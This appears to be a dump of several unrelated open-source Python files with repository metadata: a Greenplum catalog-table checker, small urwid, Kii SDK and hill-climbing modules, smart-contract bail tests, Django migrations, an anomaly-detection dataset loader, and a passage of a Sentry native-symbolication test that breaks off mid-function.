# MPP-12015: Inconsistent oids for operator sort/cmp operators
self._tables['pg_operator']._setKnownDifferences(
"oid oprcom oprnegate oprlsortop oprrsortop oprltcmpop oprgtcmpop")
self._tables['pg_aggregate']._setKnownDifferences("aggsortop")
# MPP-11281 : Inconsistent oids for views
self._tables['pg_rewrite']._setKnownDifferences("oid ev_action")
# MPP-11285 : Inconsistent oids for triggers
self._tables['pg_trigger']._setKnownDifferences("oid")
# MPP-11575 : Inconsistent handling of indpred for partial indexes
# indcheckxmin column related to HOT feature in pg_index is calculated
# independently for master and segment based on individual nodes
# transaction state, hence it can be different so skip it from checks.
self._tables['pg_index']._setKnownDifferences("indpred, indcheckxmin")
# This section should have exceptions for tables for which OIDs are not
# synchronized between master and segments, refer function
# RelationNeedsSynchronizedOIDs() in catalog.c
self._tables['pg_amop']._setKnownDifferences("oid, amopopr")
self._tables['pg_amproc']._setKnownDifferences("oid");
def _validate(self):
"""
Check that all tables defined in the catalog have either been marked
as "master only" or have a primary key
"""
for relname in sorted(self._tables):
if self._tables[relname].isMasterOnly():
continue
if self._tables[relname].getPrimaryKey() == []:
logger.warn("GPCatalogTable: unable to derive primary key for %s"
% str(relname))
# ============================================================================
class GPCatalogTable():
# --------------------------------------------------------------------
# Public API functions:
#
# Accessor functions
# - getTableName() - Returns the table name (string)
# - tableHasOids() - Returns if the table has oids (boolean)
# - isMasterOnly() - Returns if the table is "master only" (boolean)
# - isShared() - Returns if the table is shared (boolean)
# - getTableAcl() - Returns name of the acl column (string|None)
# - getPrimaryKey() - Returns the primary key (list)
# - getForeignKeys() - Returns a list of foreign keys (list)
# - getTableColumns() - Returns a list of table columns (list)
#
# --------------------------------------------------------------------
def getTableName(self):
return self._name
def tableHasOids(self):
return self._has_oid
def tableHasConsistentOids(self):
return (self._has_oid and 'oid' not in self._excluding)
def isMasterOnly(self):
return self._master
def isShared(self):
return self._isshared
def getTableAcl(self):
return self._acl
def getPrimaryKey(self):
return self._pkey
def getForeignKeys(self):
return self._fkey
def getTableColtypes(self):
return self._coltypes
def getTableColumns(self, with_oid=True, with_acl=True, excluding=None):
'''
Returns the list of columns this catalog table contains.
Optionally excluding:
- oid columns
- acl columns
- user specified list of excluded columns
By default excludes the "known differences" columns, to include them
pass [] as the excluding list.
'''
if excluding == None:
excluding = self._excluding
else:
excluding = set(excluding)
# Return all columns that are not excluded
return [
x for x in self._columns
if ((with_oid or x != 'oid') and
(with_acl or x != self._acl) and
(x not in excluding))
]
# --------------------------------------------------------------------
# Private Implementation functions
# --------------------------------------------------------------------
def __init__(self, parent, name, pkey=None):
"""
Create a new GPCatalogTable object
Uses the supplied database connection to identify:
- What are the columns in the table?
- Does the catalog table have an oid column?
- Does the catalog table have an acl column?
"""
assert(name != None)
# Split string input
if isinstance(pkey, str):
pkey = pkey.split()
self._parent = parent
self._name = name
self._master = False
self._isshared = False
self._pkey = list(pkey or [])
self._fkey = [] # foreign key
self._excluding = set()
self._columns = [] # initial value
self._coltypes = {}
self._acl = None # initial value
self._has_oid = False # initial value
# Query the database to lookup the catalog's definition
qry = """
select a.attname, a.atttypid, t.typname
from pg_attribute a
left outer join pg_type t on (a.atttypid = t.oid)
where attrelid = 'pg_catalog.%s'::regclass and
(attnum > 0 or attname='oid')
order by attnum
""" % name
try:
cur = parent._query(qry)
except:
# The cast to regclass will fail if the catalog table doesn't
# exist.
raise GPCatalogException("Catalog table %s does not exist" % name)
if cur.ntuples() == 0:
raise GPCatalogException("Catalog table %s does not exist" % name)
for row in cur.getresult():
(attname, atttype, typname) = row
# Mark if the catalog has an oid column
if attname == 'oid':
self._has_oid = True
# Detect the presence of an ACL column
if atttype == 1034:
self._acl = attname
# Add to the list of columns
self._columns.append(attname)
# Add to the coltypes dictionary
self._coltypes[attname] = typname
# If a primary key was not specified try to locate a unique index
# If a table has mutiple matching indexes, we'll pick the first index
# order by indkey to avoid the issue of MPP-16663.
if self._pkey == []:
qry = """
SELECT attname FROM (
SELECT unnest(indkey) as keynum FROM (
SELECT indkey
FROM pg_index
WHERE indisunique and not (indkey @> '-2'::int2vector) and
indrelid = 'pg_catalog.{catname}'::regclass
ORDER BY indkey LIMIT 1
) index_keys
) unnested_index_keys
JOIN pg_attribute ON (attnum = keynum)
WHERE attrelid = 'pg_catalog.{catname}'::regclass
""".format(catname=name)
cur = parent._query(qry)
self._pkey = [row[0] for row in cur.getresult()]
# Primary key must be in the column list
for k in self._pkey:
if k not in self._columns:
raise GPCatalogException("%s.%s does not exist" % (name, k))
def __str__(self):
return self._name
def __hash__(self):
return hash(self.__str__())
def __repr__(self):
return "GPCatalogTable: %s; pkey: %s; oids: %s; acl: %s" % (
str(self._name), str(self._pkey), str(self._has_oid), str(self._acl),
)
def __cmp__(self, other):
return cmp(other, self._name)
def _setMasterOnly(self, value=True):
self._master = value
def _setShared(self, value):
self._isshared = value
def _setPrimaryKey(self, pkey=None):
# Split string input
if isinstance(pkey, str):
pkey = pkey.split()
# Check that the specified keys are real columns
pkey = list(pkey or [])
for k in pkey:
if k not in self._columns:
raise Exception("%s.%s does not exist" % (self._name, k))
self._pkey = pkey
def _addForeignKey(self, fkey):
# Check that the specified keys are real columns
for k in fkey.getColumns():
if k not in self._columns:
raise Exception("%s.%s does not exist" % (self._name, k))
self._fkey.append(fkey)
def _setKnownDifferences(self, diffs):
# Split string input
if isinstance(diffs, str):
diffs = diffs.split()
self._excluding = set(diffs or [])
# ============================================================================
class GPCatalogTableForeignKey():
    """
    Describes a single primary-key/foreign-key relationship between two
    postgres catalog tables: a set of [foreign] key columns on a
    referencing table, paired with the primary-key columns of the
    referenced table.

    Tables may self-join, so the referencing and referenced table can be
    one and the same.  This class only constructs the key — it performs
    no validation against the catalog.
    """

    # --------------------------------------------------------------------
    # Private Implementation functions
    # --------------------------------------------------------------------
    def __init__(self, tname, cols, pktablename, pkey):
        """
        Create a new GPCatalogTableForeignKey object.

        tname       -- name of the table holding the foreign key
        cols        -- foreign key columns (list)
        pktablename -- name of the referenced primary-key table
        pkey        -- primary key columns (list, or whitespace-separated string)
        """
        assert(tname != None)
        assert(pktablename != None)
        # Accept "col1 col2" style string input for the primary key.
        if isinstance(pkey, str):
            pkey = pkey.split()
        self._tname = tname
        self._pktablename = pktablename
        self._pkey = list(pkey or [])
        self._columns = cols

    # --------------------------------------------------------------------
    # Public API: accessors
    # --------------------------------------------------------------------
    def getTableName(self):
        """Name of the table holding the foreign key."""
        return self._tname

    def getPkeyTableName(self):
        """Name of the referenced primary-key table."""
        return self._pktablename

    def getColumns(self):
        """The [foreign] key columns (list)."""
        return self._columns

    def getPKey(self):
        """The referenced primary key columns (list)."""
        return self._pkey

    def __str__(self):
        return "%s: %s" % (self._tname, str(self._columns))

    def __repr__(self):
        return "GPCatalogTableForeignKey: %s; col: %s; " % (
            str(self._tname), str(self._columns)
        )
| 36.117293 | 90 | 0.580065 |
795ac90352d1861979d02d02ac3c159d626372a0 | 118 | py | Python | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
] | 1 | 2021-07-20T17:01:43.000Z | 2021-07-20T17:01:43.000Z | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
] | null | null | null | archive/examples/urwid_example.py | Tubular-Terriers/code-jam | be706c485110ee49727ec33d07b5d8fef7cf49e1 | [
"MIT"
] | null | null | null | import urwid
txt = urwid.Text(u"Hello World")  # the text widget to display
fill = urwid.Filler(txt, "top")   # pin the text to the top of the screen
loop = urwid.MainLoop(fill)       # event loop with the filler as top-most widget
loop.run()                        # start the UI loop (blocks until the loop exits)
| 16.857143 | 32 | 0.70339 |
795ac9c116ca9f9fae65819b31ba4177868e8908 | 2,210 | py | Python | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | 2 | 2018-02-04T21:16:02.000Z | 2021-12-01T16:51:43.000Z | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | null | null | null | kii/results/object.py | ta2xeo/python3-kii | 892da42601318bcc15e70378614be76d68681881 | [
"MIT"
] | null | null | null | from datetime import datetime
from .base import BaseResult
class ObjectResult(BaseResult):
    """
    Result wrapper for a single object stored in a bucket.

    Reserved object fields (``_id``, ``_created``, ``_modified``, ...)
    are exposed as properties; body and update operations are delegated
    to the scope that produced this result.
    """

    def set_result(self, result):
        """Store the raw result payload; returns self so calls can be chained."""
        super().set_result(result)
        return self

    @property
    def _created(self):
        # Server timestamps are expressed in milliseconds since the epoch.
        return datetime.fromtimestamp(self._result['_created'] / 1000)

    @property
    def _id(self):
        return self._result['_id']

    @property
    def _modified(self):
        # Server timestamps are expressed in milliseconds since the epoch.
        return datetime.fromtimestamp(self._result['_modified'] / 1000)

    @property
    def _owner(self):
        return self._result['_owner']

    @property
    def _version(self):
        return int(self._result['_version'])

    def refresh(self):
        """Re-fetch this object from the server and replace the stored result."""
        latest = self.request_helper.scope.retrieve_an_object(self._id)
        return self.set_result(latest.json())

    def partially_update(self, params, **kwargs):
        """Patch a subset of this object's fields."""
        return self.request_helper.scope.partially_update_an_object(
            self._id, params, **kwargs)

    def retrieve_body(self, **kwargs):
        """Download this object's body."""
        return self.request_helper.scope.retrieve_an_object_body(self._id, **kwargs)

    def add_or_replace_body(self, body, content_type):
        """Upload (or overwrite) this object's body."""
        return self.request_helper.scope.add_or_replace_an_object_body(
            self._id, body, content_type)

    def verify_body(self):
        """Ask the server whether this object's body exists."""
        return self.request_helper.scope.verify_the_object_body_existence(self._id)

    def has_body(self):
        """Return whether this object has a body."""
        return self.request_helper.scope.has_body(self._id)

    def delete_body(self):
        """Delete this object's body."""
        return self.request_helper.scope.delete_an_object_body(self._id)

    def publish_body(self, *, expires_at=None, expires_in=None):
        """Publish this object's body, optionally bounded by an expiry."""
        return self.request_helper.scope.publish_an_object_body(
            self._id, expires_at=expires_at, expires_in=expires_in)

    def upload_body_multiple_pieces(self, body, content_type, piece_byte=1024 * 1024):
        """Upload this object's body in chunks of ``piece_byte`` bytes."""
        return self.request_helper.scope.upload_body_multiple_pieces(
            self._id, body, content_type, piece_byte)
| 30.694444 | 90 | 0.658371 |
795ac9eaea49d2291b599668a737ca47c0d326b4 | 780 | py | Python | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | 1 | 2019-09-11T04:28:40.000Z | 2019-09-11T04:28:40.000Z | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | null | null | null | Evolution/SinglePoint/ParallelHC.py | Evolutionary-Computing-2019/Angel-Corredor | 3218fe025ba6d3911bd4a1d782cbb97b5223eccc | [
"MIT"
] | null | null | null | from multiprocessing.pool import ThreadPool
from HillClimb import HillClimb
class ParallelHC:
    """Run several independent hill-climb searches in parallel and keep the best."""

    def __init__(self, threads, dim, function, stop):
        """
        threads  -- number of concurrent hill-climb runs
        dim      -- search-space dimensionality (forwarded to HillClimb)
        function -- objective function to minimise
        stop     -- stopping criterion (forwarded to HillClimb)
        """
        self.threads = threads
        self.function = function
        self.obj = HillClimb(dim, function, stop)
        self.pool = ThreadPool(processes=threads)

    def execute(self, _min=0, _max=1):
        """Launch `threads` asynchronous hill climbs over [_min, _max] and
        return the best result found."""
        pending = [
            self.pool.apply_async(self.obj.execute, args=(_min, _max))
            for _ in range(self.threads)
        ]
        candidates = [task.get() for task in pending]
        return ParallelHC.find_min(candidates, self.function)

    @staticmethod
    def find_min(results, function):
        """Return the element of `results` with the smallest objective value
        (the first one wins on ties)."""
        return min(results, key=function)
| 28.888889 | 105 | 0.670513 |
795aca3bd791cdcef8635e8c9a29afeba89d6acb | 2,532 | py | Python | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 55 | 2020-12-18T15:34:11.000Z | 2022-03-27T12:50:09.000Z | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | null | null | null | tests/test_bail.py | 1Blackdiamondsc/seed-liquidity | 91e08c1a0bfa8115db38a23d236c22dcddf039af | [
"MIT"
] | 17 | 2020-12-18T14:36:32.000Z | 2022-02-10T17:41:12.000Z | import brownie
def test_bail_seed_running(seed, lido, weth, agent, whale, chain):
    """While both targets are met and the deadline has not passed, nobody may bail."""
    amount_lido = seed.target(0)
    amount_weth = seed.target(1)
    lido.approve(seed, amount_lido)
    seed.deposit([amount_lido, 0], {'from': agent})
    weth.approve(seed, amount_weth)
    seed.deposit([0, amount_weth], {'from': whale})
    # Seed is fully funded and still running, so bail must revert for everyone.
    with brownie.reverts():
        seed.bail({'from': agent})
    with brownie.reverts():
        seed.bail({'from': whale})
def test_bail_targets_met_expired(seed, lido, weth, agent, whale, chain):
    """After the seed expires, depositors can bail and recover their full balances."""
    amount_lido = seed.target(0)
    amount_weth = seed.target(1)
    agent_lido_start = lido.balanceOf(agent)
    whale_weth_start = weth.balanceOf(whale)
    lido.approve(seed, amount_lido)
    seed.deposit([amount_lido, 0], {'from': agent})
    weth.approve(seed, amount_weth)
    seed.deposit([0, amount_weth], {'from': whale})
    chain.sleep(14 * 86400)  # jump past the seed's deadline
    seed.bail({'from': agent})
    assert lido.balanceOf(agent) == agent_lido_start
    seed.bail({'from': whale})
    assert weth.balanceOf(whale) == whale_weth_start
def test_bail_targets_not_met(seed, lido, weth, agent, whale, chain):
    """With only partial funding, providing liquidity reverts; after expiry
    both depositors can bail and are made whole."""
    amount_lido = seed.target(0) // 2
    amount_weth = seed.target(1) * 3 // 4
    agent_lido_start = lido.balanceOf(agent)
    whale_weth_start = weth.balanceOf(whale)
    lido.approve(seed, amount_lido)
    seed.deposit([amount_lido, 0], {'from': agent})
    weth.approve(seed, amount_weth)
    seed.deposit([0, amount_weth], {'from': whale})
    # Targets were never reached, so providing liquidity must revert.
    with brownie.reverts():
        seed.provide()
    chain.sleep(14 * 86400)  # jump past the seed's deadline
    seed.bail({'from': agent})
    assert lido.balanceOf(agent) == agent_lido_start
    seed.bail({'from': whale})
    assert weth.balanceOf(whale) == whale_weth_start
def test_bail_targets_met_expired_multi_deposit(seed, lido, weth, agent, whale, chain):
    """Bailing after expiry refunds the sum of several partial deposits."""
    amount_lido = seed.target(0)
    amount_weth = seed.target(1)
    agent_lido_start = lido.balanceOf(agent)
    whale_weth_start = weth.balanceOf(whale)
    lido.approve(seed, amount_lido)
    # Agent funds its target in two halves.
    for _ in range(2):
        seed.deposit([amount_lido // 2, 0], {'from': agent})
    weth.approve(seed, amount_weth)
    # Whale funds its target in four quarters.
    for _ in range(4):
        seed.deposit([0, amount_weth // 4], {'from': whale})
    chain.sleep(14 * 86400)  # jump past the seed's deadline
    seed.bail({'from': agent})
    assert lido.balanceOf(agent) == agent_lido_start
    seed.bail({'from': whale})
    assert weth.balanceOf(whale) == whale_weth_start
795acb265ffee626a9d0657f85b7bed07e9700dc | 429 | py | Python | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 1 | 2021-03-20T10:14:21.000Z | 2021-03-20T10:14:21.000Z | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 4 | 2018-03-24T21:49:02.000Z | 2021-01-13T21:31:44.000Z | src/volunteers/migrations/0012_auto_20161106_2058.py | mrts/foodbank-campaign | fbb059f3ebe44dccde4895964242b105421a69d1 | [
"MIT"
] | 3 | 2018-04-15T16:34:46.000Z | 2019-11-13T16:38:05.000Z | # -*- coding: utf-8 -*-
# Generated by Django 1.10.2 on 2016-11-06 18:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('volunteers', '0011_volunteer_notes'),
]
operations = [
migrations.AlterIndexTogether(
name='volunteer',
index_together=set([('email', 'group_name')]),
),
]
| 21.45 | 58 | 0.622378 |
795acb3ad57b8f5f0ae38c9001fc6efc6c99c71d | 8,827 | py | Python | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | backbone/CustomDataset.py | LudovicoL/PaDiM | d60da5218eeed01e6b7f1e386389446b4ebb2300 | [
"Apache-2.0"
] | null | null | null | import os
from PIL import Image
from scipy.ndimage.filters import gaussian_filter
import cv2
import shutil # To copy the file
import sys
import numpy as np
import torch
from torchvision import transforms
from torch.utils.data import Dataset
import torch.nn.functional as F
import torchvision
import backbone as bb
customdataset_folder = './datasets/CustomDataset/'
customdataset_train_dir = customdataset_folder + 'trainset/'
customdataset_test_dir = customdataset_folder + 'testset/'
customdataset_mask_dir = customdataset_folder + 'Mask_images/'
customdataset_config_file = customdataset_folder + 'config'
CUSTOMDATASET_CLASS_NAMES = ['00', '01', '02', '03', '04', '05', '06', '07', '08', '09', '10']
PATCH_SIZE = 256 # patch size
STRIDE = PATCH_SIZE # stride of patch
ANOMALY_THRESHOLD = 0
class CustomDataset(Dataset):
def __init__(self, class_name='CustomDataset', resize=256, cropsize=224, is_train=True):
self.is_train = is_train
self.class_name = class_name
self.resize = resize
self.cropsize = cropsize
self.transform = transforms.Compose([transforms.Resize(resize, Image.ANTIALIAS),
transforms.CenterCrop(cropsize),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])])
self.transform_mask = transforms.Compose([transforms.Resize(resize, Image.NEAREST),
transforms.CenterCrop(cropsize),
transforms.ToTensor()])
self.main_dir = customdataset_train_dir+self.class_name+'/' if self.is_train else customdataset_test_dir+self.class_name+'/'
self.all_imgs = sorted(os.listdir(self.main_dir))
self.mask_dir = customdataset_mask_dir
if not self.is_train:
self.all_mask = sorted(os.listdir(self.mask_dir))
def __len__(self):
return len(self.all_imgs)
def __getitem__(self, idx):
img_loc = os.path.join(self.main_dir, self.all_imgs[idx])
image = Image.open(img_loc).convert('RGB')
tensor_image = self.transform(image) # x in mvtec class
mask_name = self.all_imgs[idx].replace('.png', '_mask.png')
if os.path.isfile(self.mask_dir + mask_name):
mask_loc = os.path.join(self.mask_dir, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = self.transform_mask(mask) # mask in mvtec class
else:
tensor_mask = torch.zeros([1, self.cropsize, self.cropsize])
if int(torch.sum(tensor_mask)) > ANOMALY_THRESHOLD: # y in mvtec class
defective = 1
else:
defective = 0
return tensor_image, defective, tensor_mask
def getName(self, idx, mask=False):
if mask:
return self.all_imgs[idx].replace('.png', '_mask.png')
else:
return self.all_imgs[idx]
def resizeCustomDataset(img):
if img.shape[2] % PATCH_SIZE != 0: # width
patches_in_image = int(np.floor(img.shape[2] / PATCH_SIZE))
new_width = img.shape[2] - (img.shape[2] - (patches_in_image * PATCH_SIZE))
else:
new_width = img.shape[2]
if img.shape[1] % PATCH_SIZE != 0: # height
patches_in_image = int(np.floor(img.shape[1] / PATCH_SIZE))
new_height = img.shape[1] - (img.shape[1] - (patches_in_image * PATCH_SIZE))
else:
new_height = img.shape[1]
transform = transforms.CenterCrop((new_height, new_width))
crop_img = transform(img)
return crop_img, new_width, new_height
# --------------- Functions for patches ---------------
def DivideInPatches(img, size, stride):
p = img.unfold(1, size, stride).unfold(2, size, stride)
patches = p.contiguous().view(p.size(0), -1, size, size).permute(1,0,2,3)
return patches
# --------------- Functions to create Custom Dataset ---------------
def DeleteFolder(path):
shutil.rmtree(path)
def BinarizeMasks(Mask_path):
thresh = 128
maxval = 255
all_imgs = sorted(os.listdir(Mask_path))
for i in all_imgs:
im_gray = np.array(Image.open(Mask_path+i).convert('L'))
im_bin = (im_gray > thresh) * maxval
Image.fromarray(np.uint8(im_bin)).save(Mask_path+i)
def RenameFolder(oldname, newname):
os.rename(oldname, newname)
def CreateCustomDataset(log_file):
try:
BinarizeMasks(customdataset_mask_dir)
train_folder_temp = customdataset_folder + 'trainset_temp/'
test_folder_temp = customdataset_folder + 'testset_temp/'
Mask_path_temp = customdataset_folder + 'Mask_images_temp/'
RenameFolder(customdataset_train_dir, train_folder_temp)
RenameFolder(customdataset_test_dir, test_folder_temp)
RenameFolder(customdataset_mask_dir, Mask_path_temp)
os.makedirs(customdataset_train_dir, exist_ok=True)
os.makedirs(customdataset_test_dir, exist_ok=True)
os.makedirs(customdataset_mask_dir, exist_ok=True)
for Class in CUSTOMDATASET_CLASS_NAMES:
os.makedirs(customdataset_train_dir+Class+'/', exist_ok=True)
os.makedirs(customdataset_test_dir+Class+'/', exist_ok=True)
transform = transforms.Compose([
transforms.ToTensor()
])
for Class in CUSTOMDATASET_CLASS_NAMES:
train_temp = train_folder_temp+Class+'/'
test_temp = test_folder_temp+Class+'/'
all_train_imgs = sorted(os.listdir(train_temp))
for img in all_train_imgs:
img_loc = os.path.join(train_temp, img)
image = Image.open(img_loc).convert('RGB')
tensor_image = transform(image)
tensor_image, _, _ = resizeCustomDataset(tensor_image)
train_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(train_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(customdataset_train_dir+Class+'/', name)
torchvision.utils.save_image(patch, name)
all_test_imgs = sorted(os.listdir(test_temp))
for img in all_test_imgs:
img_loc = os.path.join(test_temp, img)
image = Image.open(img_loc).convert('RGB')
tensor_image = transform(image)
tensor_image, new_width, new_height = resizeCustomDataset(tensor_image)
test_patches = DivideInPatches(tensor_image, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_patches):
name = img.replace('.png', '_'+str(idx)+'.png')
name = os.path.join(customdataset_test_dir+Class+'/', name)
torchvision.utils.save_image(patch, name)
mask_name = img.replace('.png', '_mask.png')
if os.path.isfile(Mask_path_temp + mask_name):
mask_loc = os.path.join(Mask_path_temp, mask_name)
mask = Image.open(mask_loc).convert('L')
tensor_mask = transform(mask)
else:
tensor_mask = torch.zeros([1, new_height, new_width])
transform_mask = transforms.CenterCrop((new_height, new_width))
tensor_mask = transform_mask(tensor_mask)
test_masks = DivideInPatches(tensor_mask, PATCH_SIZE, STRIDE)
for idx, patch in enumerate(test_masks):
name = mask_name.replace('_mask.png', '_'+str(idx)+'_mask.png')
name = os.path.join(customdataset_mask_dir, name)
torchvision.utils.save_image(patch, name)
DeleteFolder(train_folder_temp)
DeleteFolder(test_folder_temp)
DeleteFolder(Mask_path_temp)
f = open(customdataset_config_file, "a")
f.write("This file indicates that the dataset is ready to be used. Don't delete it!")
f.close()
except:
bb.myPrint("Error in CreateCustomDataset function!", log_file)
DeleteFolder(customdataset_folder)
sys.exit(-1)
def prepareCustomDataset(log_file):
if os.path.isdir(customdataset_folder):
if (os.path.exists(customdataset_config_file)):
return
else:
bb.myPrint("Preparing the Custom Dataset...", log_file)
CreateCustomDataset(log_file)
else:
bb.myPrint('ERROR: Custom Dataset not found!', log_file)
sys.exit(-1)
| 43.915423 | 132 | 0.612213 |
795accf8a97e01f90b58b90e6f09f53e85384774 | 1,263 | py | Python | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | mall/apps/oauth/migrations/0002_oauthsinauser.py | xxbsg/meiduo | 0e82628833c4b482884cd392b8d22cb8558f1ffd | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11.11 on 2019-01-25 02:45
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('oauth', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='OAuthSinaUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_time', models.DateTimeField(auto_now_add=True, verbose_name='创建时间')),
('update_time', models.DateTimeField(auto_now=True, verbose_name='更新时间')),
('access_token', models.CharField(db_index=True, max_length=64, verbose_name='access_token')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='用户')),
],
options={
'db_table': 'tb_oauth_sina',
'verbose_name_plural': 'sina登录用户数据',
'verbose_name': 'sina登录用户数据',
},
),
]
| 37.147059 | 137 | 0.623911 |
795acd4e08d70195880d410c45a55289d7ec3faa | 44,335 | py | Python | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | 1 | 2017-10-18T19:40:14.000Z | 2017-10-18T19:40:14.000Z | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | null | null | null | tests/sentry/lang/native/test_plugin.py | Munyola/sentry | ab8923b2801d7d72d6903e0d9180584817bb1b9a | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
import os
import zipfile
from mock import patch
from six import BytesIO
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from sentry.models import Event
from sentry.testutils import TestCase
from sentry.lang.native.symbolizer import Symbolizer
from symbolic import parse_addr
class BasicResolvingIntegrationTest(TestCase):
@patch('sentry.lang.native.symbolizer.Symbolizer._symbolize_app_frame')
def test_frame_resolution(self, symbolize_frame):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
symbolize_frame.return_value = [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 42,
'colno': 23,
'package': object_name,
'function': 'real_main',
'symbol_addr': '0x1000262a0',
"instruction_addr": '0x100026330',
}]
event_data = {
"sentry.interfaces.User": {
"ip_address": "31.172.207.97"
},
"extra": {},
"project": self.project.id,
"platform": "cocoa",
"debug_meta": {
"images": [
{
"type": "apple",
"cpu_subtype": 0,
"uuid": "C05B4DDD-69A7-3840-A649-32180D341587",
"image_vmaddr": 4294967296,
"image_addr": 4295098368,
"cpu_type": 16777228,
"image_size": 32768,
"name": object_name,
}
],
"sdk_info": {
"dsym_type": "macho",
"sdk_name": "iOS",
"version_major": 9,
"version_minor": 3,
"version_patchlevel": 0
}
},
"sentry.interfaces.Exception": {
"values": [
{
'stacktrace': {
"frames": [
{
"function": "<redacted>",
"abs_path": None,
"package": "/usr/lib/system/libdyld.dylib",
"filename": None,
"symbol_addr": "0x002ac28b4",
"lineno": None,
"instruction_addr": "0x002ac28b8"
},
{
"function": "main",
"instruction_addr": 4295123760
},
{
"platform": "javascript",
"function": "merge",
"abs_path": "/scripts/views.js",
"vars": {},
"module": None,
"filename": "../../sentry/scripts/views.js",
"colno": 16,
"in_app": True,
"lineno": 268
}
]
},
"type": "NSRangeException",
"mechanism": {
"posix_signal": {
"signal": 6,
"code": 0,
"name": "SIGABRT",
"code_name": None
},
"type": "cocoa",
"mach_exception": {
"subcode": 0,
"code": 0,
"exception": 10,
"exception_name": "EXC_CRASH"
}
},
"value": (
"*** -[__NSArray0 objectAtIndex:]: index 3 "
"beyond bounds for empty NSArray"
)
}
]
},
"contexts": {
"device": {
"model_id": "N102AP",
"model": "iPod7,1",
"arch": "arm64",
"family": "iPod"
},
"os": {
"version": "9.3.2",
"rooted": False,
"build": "13F69",
"name": "iOS"
}
},
"threads": {
"values": [
{
"id": 39,
'stacktrace': {
"frames": [
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_pthread.dylib",
"symbol_addr": "0x00000001843a102c",
"image_addr": "0x00000001843a0000",
"instruction_addr": "0x00000001843a1530"
},
{
"platform": "apple",
"package": "\/usr\/lib\/system\/libsystem_kernel.dylib",
"symbol_addr": "0x00000001842d8b40",
"image_addr": "0x00000001842bc000",
"instruction_addr": "0x00000001842d8b48"
}
]
},
"crashed": False,
"current": False
}
]
}
}
resp = self._postWithHeader(event_data)
assert resp.status_code == 200
event = Event.objects.get()
bt = event.interfaces['sentry.interfaces.Exception'].values[0].stacktrace
frames = bt.frames
assert frames[0].function == '<redacted>'
assert frames[0].instruction_addr == '0x2ac28b8'
assert not frames[0].in_app
assert frames[1].function == 'real_main'
assert frames[1].filename == 'Foo.swift'
assert frames[1].lineno == 42
assert frames[1].colno == 23
assert frames[1].package == object_name
assert frames[1].instruction_addr == '0x100026330'
assert frames[1].in_app
assert frames[2].platform == 'javascript'
assert frames[2].abs_path == '/scripts/views.js'
assert frames[2].function == 'merge'
assert frames[2].lineno == 268
assert frames[2].colno == 16
assert frames[2].filename == '../../sentry/scripts/views.js'
assert frames[2].in_app
assert len(event.interfaces['threads'].values) == 1
def sym_app_frame(self, instruction_addr, img, sdk_info=None):
object_name = (
"/var/containers/Bundle/Application/"
"B33C37A8-F933-4B6B-9FFA-152282BFDF13/"
"SentryTest.app/SentryTest"
)
if not (4295098384 <= parse_addr(instruction_addr) < 4295098388):
return [{
'filename': 'Foo.swift',
'abs_path': 'Foo.swift',
'lineno': 82,
'colno': 23,
'package': object_name,
'function': 'other_main',
'symbol_addr': '0x1',
